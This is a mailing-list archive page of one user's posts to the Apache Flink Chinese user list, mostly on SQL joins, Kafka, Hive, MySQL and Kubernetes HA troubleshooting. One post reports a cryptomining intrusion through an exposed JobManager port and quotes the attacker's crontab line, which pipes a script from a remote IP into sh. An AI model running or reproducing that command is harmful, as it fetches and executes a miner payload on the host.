from:"macdoor"

Re: Upsert kafka 作为 source 的几个问题

2021-05-11 Thread macdoor

在做join时 ksql 会强制检查两个表的key是否相同，如果不同则报错，感觉这是一个比较好的方法。你说 “目前 Upsert-kafka 要求具有相同key的数据在相同 partition 的。因为 kafka 仅保证 partiiton 内按 offset 读取，如果相同 key 的数据分布在不同 partition 的话，那么读取会乱序。” flink 中两个表不使用相同的key 也可以成功 join ，但数据会出现错误，这样的话，在编译sql时报错应该更好 -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: Upsert kafka 作为 source 的几个问题

2021-05-05 Thread macdoor

我也想知道 flink 在对 kafka 消息进行 join 时，是否对按主键分区有要求，KSQL有强制性的要求 -- Sent from: http://apache-flink.147419.n8.nabble.com/

Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启？

2021-03-21 Thread macdoor

Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启，同时保证集群正常运行？我发现 job manager 占用内存似乎总是在缓慢不断增长，Hadoop Name Node 也有这个问题，我通过隔一段时间轮动重启Hadoop Name Node 解决这个问题，在HA模式下Flink job manager 是否可以轮动重启？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

什么原因导致 Could not connect to BlobServer ？

2021-03-08 Thread macdoor

运行 1.12.2 standalone 集群，不定期会出现类似这种错误，请问这有可能是什么原因导致的？谢谢！ Caused by: java.io.IOException: Failed to fetch BLOB fb90d0fce9ff3ad8353ea97e46f9c913/p-bc0d39187ed200f9df64f90463534862858961a2-2ff77a5adb95af29376c6699173c3969 from hb3-dev-gem-svc1-000/10.30.69.13:43003 and store it under

Re: flink 1.12.2-rc2 被挖矿

2021-03-01 Thread macdoor

我不是安全专家，不知道如何才能确认是 flink 的问题，但从现象看跟之前 flink 1.10 遇到的问题非常类似，建议你们能有这方面的测试用例，也能把测试结果提供出来 -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: flink 1.12.2-rc2 被挖矿

2021-03-01 Thread macdoor

我自己编译 https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz，然后部署在了服务器上，为了更新操作系统补丁，绑定了公网ip，这时 jobmanager 的 8081 端口就暴露在互联网上了，然后就有挖矿程序来了，在crontab 中增加了这行 * * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1 之前使用 1.10时也遇到过类似情况，我记得 1.12 似乎没有这个问题了，所以这次没有留意，就过有发生了，我基本可以确定是 flink

flink 1.12.2-rc2 被挖矿

2021-02-28 Thread macdoor

我编译的flink 1.12.2-rc2 被挖矿，这个漏洞之前不是堵住了吗？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: flink 1.12 中如何读取 mysql datetime 字段

2021-02-02 Thread macdoor

我通过实验确认这是升级 MySql JDBC Driver 8.0.23 造成的，回到 MySql JDBC Driver 8.0.22，就没有问题，我提交了 issue https://issues.apache.org/jira/browse/FLINK-21240 -- Sent from: http://apache-flink.147419.n8.nabble.com/

flink 1.12 中如何读取 mysql datetime 字段

2021-01-31 Thread macdoor

在 mysql 中创建表 CREATE TABLE `p_port_packet_loss_5m` ( `id` binary(16) NOT NULL, `coltime` datetime NOT NULL, ... 在flink 中创建表 create table if not exists p_port_packet_loss_5m ( id bytes, coltime timestamp, ...) WITH ( 'connector' = 'jdbc', 'url' = 'jdbc:mysql://ip:port/mydatabase',

Re: 是否可以 hive 流 join hive 流？

2021-01-31 Thread macdoor

当前的 1.13-snapshot 支持了吗？我可以试试吗？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: 是否可以 hive 流 join hive 流？

2021-01-31 Thread macdoor

p1.time 是数据记录里的时间，也用这个时间做分区 -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长

2021-01-31 Thread macdoor

有时候这种job持续2个多小时，我只能cancel job，但无法正常 cancel，都会导致 taskmanager 挂掉，错误如下 2021-01-31 23:04:23,677 ERROR org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Task did not exit gracefully within 180 + seconds. org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully within

Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长

2021-01-31 Thread macdoor

打开了 debug 级别的日志，有这样的错误 2021-01-31 20:45:30,364 DEBUG org.apache.flink.runtime.io.network.partition.ResultPartitionManager [] - Released partition dc8a2804b6df6b0ceaee2610ccf6c6e5#312 produced by 448c5ac36dcda818f56ec5bbd728da10. 2021-01-31 20:45:30,392 DEBUG

请教 flink 1.12.1 插入 mysql 有时耗时很长

2021-01-31 Thread macdoor

周期性batch mode 从 hive 提取数据插入 mysql，每批次 10K 到 20K 行数据，多数情况下 10-20秒可以完成，但不定期就会很长时间，能达到 20多分钟，但也能成功，查看了日志也看不到错误，检查 mysql 也没有发现锁表，怀疑 hive metastore 的性能，但也没看出问题。请教分析思路，从 flink 上能看出job 在等待什么吗？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

是否可以 hive 流 join hive 流？

2021-01-30 Thread macdoor

具体需求是这样，采集取得的通道总流量5分钟一次存入 hive 表，为了取得 5 分钟内该通道的流量，需要前后2次采集到的总流量相减，我想用同一个 hive 表自己相互 join，形成 2 个 hive 流 join，不知道是否可以实现？或者有其他实现方法吗？我现在使用 crontab 定时 batch 模式做，希望能改成 stream 模式 select p1.traffic -p2.traffic from p as p1 inner join p as p2 on p1.id=p2.id and p1.time=p2.time + interval 5 minutes --

Re: pyflink 1.12.1 没有 python 3.8 安装文件

2021-01-23 Thread macdoor

谢谢！不好意思没有仔细读文档，现在哪里能下载build 好的 Linux 下的 Python 3.8 的 pyflink 1.12.1 吗？觉得自己build的还是不放心 -- Sent from: http://apache-flink.147419.n8.nabble.com/

pyflink 1.12.1 没有 python 3.8 安装文件

2021-01-23 Thread macdoor

在 Linux python 3.8上无法安装 pyflink 1.12.1 ，最高是 1.12.0，查看可以提供的安装文件 https://pypi.org/project/apache-flink/#files 中，python 3.8 只有一个安装文件 apache_flink-1.12.1-cp38-cp38-macosx_10_9_x86_64.whl 。而 pyflink 1.12.0 的 python 3.8 有 2个安装文件 apache_flink-1.12.0-cp38-cp38-manylinux1_x86_64.whl 和

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-20 Thread macdoor

拿到了吗？有什么发现吗？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-19 Thread macdoor

https://pan.baidu.com/s/1GHdfeF2y8RUW_Htgdn4KbQ 提取码: piaf -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-18 Thread macdoor

可以的，怎么发给你？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-18 Thread macdoor

多谢！打开了DEBUG日志，仍然只有最后一个ERROR，不过之前有不少包含 kubernetes.client.dsl.internal.WatchConnectionManager 的日志，grep 了一部分，能看出些什么吗？ job-debug-0118.log:2021-01-19 02:12:25,551 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-18 Thread macdoor

我查看了一下之前的日志，没有发现 too old resource version，而且连续几个日志都没有其他错误，直接就这个错误，restart，然后就是一个新日志了。我用的k8s集群似乎网络确实不太稳定，请教一下如何测试Pod和APIServer之间的网络比较容易说明问题？ping？或者什么工具？ -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: flink1.12.0 HA on k8s native运行一段时间后jobmanager-leader产生大量ConfigMap问题

2021-01-17 Thread macdoor

您好，我刚刚开始使用 flink 1.12.1 HA on k8s，发现jobmanager大约半小时左右会restart，都是这种错误，您遇到过吗？谢谢！ 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Suspending SlotPool. 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.JobMaster [] -

K8s HA Session模式下1.12.1 jobmanager 周期性 restart

2021-01-17 Thread macdoor

大约几十分钟就会restart，请教大佬们有查的思路，每次抛出的错误都是一样的，运行一段时间也会积累很多ConfigMap，下面是一个具体的错误错误内容 2021-01-17 04:16:46,116 ERROR org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Fatal error occurred in ResourceManager. org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error

flink 1.12 插入 hive 表找不到 .staging_xxxx 文件

2020-12-27 Thread macdoor

flink 1.12 standalone cluster，定时batch 模式 insert overwrite 到 hive 表，会随机出现找不到 .staging_ 文件的错误，完整错误信息如下：org.apache.flink.runtime.JobException: Recovery is suppressed by NoRestartBackoffTimeStrategy at

flink sql 中是否可以使用 mysql 的存储过程和函数？

2020-11-23 Thread macdoor

需求是这样，mysql中使用 binary(16) 存储 uuid，读取到 flink中需要转换成文本串的uuid，sql是这样 select bin_to_uuid(id, true) as text_uuid from usertable 我尝试使用，报错说 bin_to_uuid 找不到 -- Sent from: http://apache-flink.147419.n8.nabble.com/

Re: 用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确

2020-11-23 Thread macdoor

自己回答一下，供其他人参考。换成flink 1.12.0-rc1，用相同sql处理相同数据，结果跟 hive 计算的结果相同，确认是 1.11.2 的一个bug，1.12应该已经改正了 -- Sent from: http://apache-flink.147419.n8.nabble.com/

flink 1.11.2 SQL Client self inner join 结果不正确

2020-11-22 Thread macdoor

我用相同的一个表自己 inner join 自己，取不同时间点，得到相同值 sql是这样，p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表，时间不同 select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d from snmpprobe.p_snmp_ifxtable as p0m inner join snmpprobe.p_snmp_ifxtable as p5m on

用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确

2020-11-22 Thread macdoor

我用相同的一个表自己 inner join 自己，取不同时间点，得到相同值 sql是这样，p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表，时间不同 select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d from snmpprobe.p_snmp_ifxtable as p0m inner join snmpprobe.p_snmp_ifxtable as p5m on

Re: Upsert kafka 作为 source 的几个问题

Re: Upsert kafka 作为 source 的几个问题

Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启？

什么原因导致 Could not connect to BlobServer ？

Re: flink 1.12.2-rc2 被挖矿

Re: flink 1.12.2-rc2 被挖矿

flink 1.12.2-rc2 被挖矿

Re: flink 1.12 中如何读取 mysql datetime 字段

flink 1.12 中如何读取 mysql datetime 字段

Re: 是否可以 hive 流 join hive 流？

Re: 是否可以 hive 流 join hive 流？

Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长

Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长

请教 flink 1.12.1 插入 mysql 有时耗时很长

是否可以 hive 流 join hive 流？

Re: pyflink 1.12.1 没有 python 3.8 安装文件

pyflink 1.12.1 没有 python 3.8 安装文件

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart

Re: flink1.12.0 HA on k8s native运行一段时间后jobmanager-leader产生大量ConfigMap问题

K8s HA Session模式下1.12.1 jobmanager 周期性 restart

flink 1.12 插入 hive 表找不到 .staging_xxxx 文件

flink sql 中是否可以使用 mysql 的存储过程和函数？

Re: 用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确

flink 1.11.2 SQL Client self inner join 结果不正确

用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确

29 matches

Site Navigation

Mail list logo

Footer information